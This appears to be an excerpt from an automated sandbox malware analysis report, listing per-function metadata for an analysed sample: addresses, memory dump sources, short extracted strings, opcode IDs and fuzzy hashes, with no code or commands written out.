                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: e>3@$i>3@
                                                                                                                                                                                                                                                          • API String ID: 2994545307-675609054
                                                                                                                                                                                                                                                          • Opcode ID: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
                                                                                                                                                                                                                                                          • Instruction ID: d63809bf3076d72f070bdb060dff65e02fc893e24afa0153ad856657245a98a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83A1F436A083119BC724DF18C88092BB7E2FF9C710F19947DE8869B365DB35AC55CB86
                                                                                                                                                                                                                                                          Function 00415EDC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: !LDw$D
                                                                                                                                                                                                                                                          • API String ID: 0-631248872
                                                                                                                                                                                                                                                          • Opcode ID: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                                                                                                                                                                                          • Instruction ID: 7e09ab24442d4b71b88b13391f34237f2dfc9f095084ee9819a17599225fc662
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCA1A1B0118340CFD724DF24C8A1BABBBF1FF96305F09595DE48A4B2A2E7798945CB46
                                                                                                                                                                                                                                                          Function 00424280 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: bBB$rBB
                                                                                                                                                                                                                                                          • API String ID: 0-3277761424
                                                                                                                                                                                                                                                          • Opcode ID: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                                                                                                                                                                                          • Instruction ID: be6856a020535e4a6e683abf22a1b7757c0c9bd1d2ca0ad35f5e609e3485cc7a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83713579A0C3409FD724CF18EC41BABB7E4EB86308F50493EF59997282D774A905CB96
                                                                                                                                                                                                                                                          Function 02489E66 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _q0s$gfff
                                                                                                                                                                                                                                                          • API String ID: 0-1196501146
                                                                                                                                                                                                                                                          • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction ID: b35f9c284684a1d2b3438c7372489de28762a9bfa06e0f2c03d8645e6f4d9608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6171C2726196508BC738DF25C8527EF77A2FFD5324F188A2DD8998B794E7388501CB82
                                                                                                                                                                                                                                                          Function 0249A347 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: gy${
                                                                                                                                                                                                                                                          • API String ID: 0-2069607922
                                                                                                                                                                                                                                                          • Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction ID: ed7d28f547c76ceeafa36ca8f2d54dfdddf3ab4be68e843ec7e75833a51ca910
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E831DFB02883948FD3508F519880B5FBFF1FBC6714F159A6CE6D1AB691C77590468B06
                                                                                                                                                                                                                                                          Function 0042A0E0 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: gy${
                                                                                                                                                                                                                                                          • API String ID: 0-2069607922
                                                                                                                                                                                                                                                          • Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction ID: 431e554adce80ef47d4d1f40f80e38f5c8695c8e2ce9c58edc59fdf38191c638
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3331FFB02883948FD3508F119C80B6FBBF1FBC6714F149A6CE6D1AB291C77990468B0A
                                                                                                                                                                                                                                                          Function 0043B100 Relevance: 2.0, Strings: 1, Instructions: 734COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                          • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                          • Opcode ID: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
                                                                                                                                                                                                                                                          • Instruction ID: fe604cc3133df0d3ef17166e2c6d21145ffaf46a9ca28f7e45b4cb97c9031a62
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 632213756083418FD714CF19C880B2BB7E2EBC9318F199A6EE595873A1D734EC01CB96
                                                                                                                                                                                                                                                          Function 0043D980 Relevance: 2.0, Strings: 1, Instructions: 709COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                                                                                                                                                                                          • Instruction ID: cc3b19862de00450c502d71b80b37b6a0facead2af28862af59a70b515e96c0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44
                                                                                                                                                                                                                                                          Function 00414170 Relevance: 1.9, Strings: 1, Instructions: 633COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: wY
                                                                                                                                                                                                                                                          • API String ID: 0-856691870
                                                                                                                                                                                                                                                          • Opcode ID: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
                                                                                                                                                                                                                                                          • Instruction ID: 2400616457e19e448041b88361ef1ce1cfcd4646f93bfc5c6be26526a3fe0eb5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF155B55083009BD3149F24D8927BBB3A1FFD6314F19882DE8C597391E738D986C79A
                                                                                                                                                                                                                                                          Function 0043DA80 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                                                                                                                                                                                          • Instruction ID: 7582ed78cd08e368e7f7bf7a7ebd23f02f26f556a500b2e852d8dce14501ab51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44
                                                                                                                                                                                                                                                          Function 00424486 Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: no
                                                                                                                                                                                                                                                          • API String ID: 0-1739204639
                                                                                                                                                                                                                                                          • Opcode ID: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
                                                                                                                                                                                                                                                          • Instruction ID: 98ceff42bfd2534dc1cac3b1d484b7cbff31ece01bcc915c749c6e1bd002b957
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1F1F1766183628BC714DF24E8506ABB3F2FFC5740F85886EE8C197350E7389A45DB86
                                                                                                                                                                                                                                                          Function 0043DBF0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                                                                                                                                                                                          • Instruction ID: f391942a458117ab2eff221fcfc61aedbfa58ea332473f0907b71af19172290f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E1E239B18211CFCB08CF29D8916AEB7B2FF8A315F1986BDD50697395C7349852CB84
                                                                                                                                                                                                                                                          Function 0248D467 Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: pq
                                                                                                                                                                                                                                                          • API String ID: 0-1239689891
                                                                                                                                                                                                                                                          • Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                                                                                                                                                                                          • Instruction ID: a5e717fb7688114d9fa1566d0cd21e71ba382dc586e8a5b509a86c1e8e738340
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEC1DEB5A293018BD728DF28CC517ABB3F2EF85714F08992DE8C58B394E7389905C756
                                                                                                                                                                                                                                                          Function 0041D200 Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: pq
                                                                                                                                                                                                                                                          • API String ID: 0-1239689891
                                                                                                                                                                                                                                                          • Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                                                                                                                                                                                          • Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A
                                                                                                                                                                                                                                                          Function 0043DC80 Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                                                                                                                                                                                          • Instruction ID: 13288392fc325517df86cad4ade3bbe7b083210dd55d9389e011795523972a75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1D1E236B18211CFCB08CF29D8916AEB7B2FB8A315F1986BDD54697395C7349C02CB94
                                                                                                                                                                                                                                                          Function 0043DD00 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                                                                                                                                                                                          • Instruction ID: c02c92b643ec8d6061b0b585771056a8a7c41fa14bd75fb70af057f1c39578d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D1F135A18215CFCB08CF39D8912BEBBB2FB8A315F1986BDD44297381C7349802CB94
                                                                                                                                                                                                                                                          Function 00438F45 Relevance: 1.7, Strings: 1, Instructions: 418COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                          • API String ID: 0-336475711
                                                                                                                                                                                                                                                          • Opcode ID: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                                                                                                                                                                                          • Instruction ID: 45885d3b4d1d012f206d53a257d01764ec68dfae15cf9f6058a92df6a7d4df09
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3D1483AA24222CBCB148FB8D9411AFB3B1FF4A311F1A8879C941A7394D7799D52C794
                                                                                                                                                                                                                                                          Function 0249B737 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
                                                                                                                                                                                                                                                          • Instruction ID: ac417bd7033ad02f43cf28793838c2ec0b1da586e3ce554615b0e95396046e71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D1F3B2A083555FCF14CE24D89076BBBE6EFC4218F08856EE8998B381D775D944CBD1
                                                                                                                                                                                                                                                          Function 0042B4D0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                                                                                                                                                                                          • Instruction ID: 5488062bd572d25524ecec9402af32519797fcb3431be29340e35f15c478a4d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FD116B2B083249FC714DE15E48076BB7EAEF84314F48856EE9998B382D738DD4487D6
                                                                                                                                                                                                                                                          Function 00416930 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                          • API String ID: 2994545307-4251816714
                                                                                                                                                                                                                                                          • Opcode ID: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
                                                                                                                                                                                                                                                          • Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A
                                                                                                                                                                                                                                                          Function 024AF847 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: *+,-
                                                                                                                                                                                                                                                          • API String ID: 0-2789019292
